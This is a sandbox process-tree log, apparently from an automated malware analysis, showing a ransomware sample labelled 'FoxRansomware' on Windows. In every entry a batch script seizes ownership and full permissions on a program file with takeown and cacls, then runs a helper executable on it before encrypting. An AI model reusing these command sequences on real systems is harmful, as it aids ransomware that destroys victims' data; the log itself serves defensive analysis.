C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C3⤵PID:2680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"3⤵
- Modifies file permissions
PID:1528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner3⤵PID:976
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner4⤵PID:3396
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""2⤵PID:204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C3⤵PID:3284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"3⤵
- Modifies file permissions
PID:216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "can.fca" -nobanner3⤵PID:224
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "can.fca" -nobanner4⤵PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""2⤵PID:3060
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C3⤵PID:3196
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"3⤵
- Modifies file permissions
PID:3964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "usa03.ths" -nobanner3⤵PID:3956
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "usa03.ths" -nobanner4⤵PID:3552
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""2⤵PID:2688
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C3⤵PID:1420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"3⤵PID:1876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "GREEK.TXT" -nobanner3⤵PID:2820
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "GREEK.TXT" -nobanner4⤵PID:584
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""2⤵PID:2732
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C3⤵PID:4016
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"3⤵PID:3852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CP1253.TXT" -nobanner3⤵PID:3068
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "CP1253.TXT" -nobanner4⤵PID:1612
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:2116
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:3660
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "device.png" -nobanner3⤵PID:1404
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "device.png" -nobanner4⤵PID:3120
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3836
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:2524
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:3752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:560
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:3624
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1164
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:4000
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:1948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "tasks.xml" -nobanner3⤵PID:3512
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "tasks.xml" -nobanner4⤵PID:2912
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1784
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:3796
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:2296
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵PID:1776
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "watermark.png" -nobanner3⤵PID:1280
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "watermark.png" -nobanner4⤵PID:1524
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:3460
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:2004
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵PID:3292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:968
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:3504
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:4080
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:3020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "overlay.png" -nobanner3⤵PID:2360
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "overlay.png" -nobanner4⤵PID:576
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2420
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""2⤵PID:2624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:296
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:2200
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:3656
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""2⤵PID:2388
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C3⤵PID:4032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "MahjongMCE.png" -nobanner3⤵PID:816
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "MahjongMCE.png" -nobanner4⤵PID:3716
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:3884
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:2876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:3156
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:1968
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:308
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:4044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:884
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:612
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:2980
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""2⤵PID:1592
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C3⤵PID:3664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "PurblePlaceMCE.png" -nobanner3⤵PID:3264
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "PurblePlaceMCE.png" -nobanner4⤵PID:2224
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""2⤵PID:3452
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C3⤵PID:592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"3⤵PID:3476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "SolitaireMCE.png" -nobanner3⤵PID:3312
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "SolitaireMCE.png" -nobanner4⤵PID:4092
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4020
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""2⤵PID:960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C3⤵PID:3136
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"3⤵
- Modifies file permissions
PID:2700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "SpiderSolitaireMCE.png" -nobanner3⤵PID:3344
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "SpiderSolitaireMCE.png" -nobanner4⤵PID:2604
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""2⤵PID:3400
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C3⤵PID:1276
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"3⤵PID:324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "adobepdf.xdc" -nobanner3⤵PID:3392
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "adobepdf.xdc" -nobanner4⤵PID:3604
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2396
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵PID:3440
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵PID:1076
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵
- Modifies file permissions
PID:2888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "eula.ini" -nobanner3⤵PID:2516
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "eula.ini" -nobanner4⤵PID:1292
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2616
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵PID:1724
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵PID:1520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵PID:2564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "AcroSign.prc" -nobanner3⤵PID:2496
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "AcroSign.prc" -nobanner4⤵PID:2536
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1060
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""2⤵PID:2644
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C3⤵PID:2500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"3⤵PID:3004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "distribute_form.gif" -nobanner3⤵PID:3520
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "distribute_form.gif" -nobanner4⤵PID:1764
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""2⤵PID:3612
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C3⤵PID:4068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"3⤵PID:3108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "main.css" -nobanner3⤵PID:1668
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "main.css" -nobanner4⤵PID:3644
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""2⤵PID:2580
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C3⤵PID:3640
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"3⤵PID:2424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "review_shared.gif" -nobanner3⤵PID:2948
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "review_shared.gif" -nobanner4⤵PID:3592
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""2⤵PID:976
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:1628
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"3⤵
- Modifies file permissions
PID:3912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner3⤵PID:2928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner4⤵PID:208
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""2⤵PID:2956
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C3⤵PID:3892
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"3⤵PID:3964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner3⤵PID:3772
-
